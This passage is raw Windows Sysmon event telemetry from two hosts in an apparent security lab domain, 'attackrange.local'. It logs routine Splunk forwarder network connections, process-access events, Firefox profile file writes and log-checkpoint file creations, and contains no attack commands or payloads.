354300x800000000000000083762Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.660{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50190-false10.0.1.12-8000- 10341000x800000000000000083794Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:36.720{2FDD8D40-B558-615A-A201-00000000FD01}40603576C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000083793Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:36.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0BDB78C91C47ADC8AE880E8C7278876,SHA256=066183C8FDEDE5A4C55D5F724B2A9E200E0A9A9041AF0E5C33560B73B4C0CCA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108230Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:36.795{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05F79A6F505D34D10F77137E297E7554,SHA256=F46FD15BE0659057B9CB82A3666D55082F1BC18CCE693FBA00680510A234B149,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083792Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:36.533{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7FD67381E0F6376F143220EAC85C0889,SHA256=5B1C5B7F1DF6C5F85E1A9C40D2170DC155CD44F9ED6735AD6E2104B04F4B52C2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083791Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:36.533{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B558-615A-A201-00000000FD01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083790Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:36.533{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B558-615A-A201-00000000FD01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083789Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:36.533{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083788Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:36.533{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083787Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:36.533{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083786Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:36.533{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083785Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:36.533{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083784Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:36.533{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083783Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:36.533{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083782Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:36.533{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083781Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:36.533{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083780Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:36.533{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B558-615A-A201-00000000FD01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083779Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:36.534{2FDD8D40-B558-615A-A201-00000000FD01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000108229Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:34.473{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51951-false10.0.1.12-8000- 23542300x8000000000000000108228Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:36.595{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108227Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:36.595{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108226Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:36.595{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108231Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:37.810{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=394110D424B68A78E0215865956CF76E,SHA256=7BB8593BAB72A80765B2D03A1E3BFB0324DEF8AECD331FED034394104FE64374,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083796Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:37.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=867CD377A2AAEB47C6D500D48AEBAF99,SHA256=0A0EE476DDCE29148BB59BB07AF40D8C24429389FD092655089850D2BD04B325,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083795Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:37.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F84A4F51B231F98F8934201175F55831,SHA256=E659704EAF2BD2D78327D73CAE4BA7929D087E3AD2DAC85B2494A15827CDC00B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108232Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:38.825{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6CFC28A37C53020116F01AF9BAED7F2,SHA256=96C15B096A616212468B2ADB86697786F9EDC68D1A40F41EDF3B1FD70C1A0D0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083797Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:38.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92DF0107116586CF1674F0486ABC795D,SHA256=6EA5156DE5F19BD3BE40E5A86383259977C9D219136425BB1D7871C32EBAA4D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083799Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:39.579{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B94AF402DC56A5BF263EEC28DD3165CF,SHA256=9ED24369C53B9A827851C32C9942CEB75855E4E76BDCB38077200BE9F16FC4E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108273Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.177{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108272Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.177{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108271Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.177{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108270Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.177{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108269Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.177{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108268Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:39.176{58E9C193-ACA7-615A-0D00-00000000FC01}896916C:\Windows\system32\svchost.exe{58E9C193-AE76-615A-DB00-00000000FC01}5140C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108267Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 